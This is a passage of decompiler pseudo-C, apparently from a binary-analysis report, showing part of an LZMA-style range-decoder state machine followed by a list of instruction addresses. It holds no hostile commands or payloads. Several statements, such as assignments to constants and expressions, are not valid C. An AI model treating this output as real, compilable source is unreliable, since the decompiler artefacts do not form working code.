												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                                    0x00000000
                                                                                                                                    0x00406ffe
                                                                                                                                    0x00406ffe
                                                                                                                                    0x00407002
                                                                                                                                    0x00407023
                                                                                                                                    0x0040702a
                                                                                                                                    0x00407030
                                                                                                                                    0x00407036
                                                                                                                                    0x00407048
                                                                                                                                    0x0040704e
                                                                                                                                    0x00407053
                                                                                                                                    0x00000000
                                                                                                                                    0x00407004
                                                                                                                                    0x0040700a
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073d4
                                                                                                                                    0x004073da
                                                                                                                                    0x004073e0
                                                                                                                                    0x004073fa
                                                                                                                                    0x004073fd
                                                                                                                                    0x00407403
                                                                                                                                    0x0040740e
                                                                                                                                    0x00407410
                                                                                                                                    0x004073e2
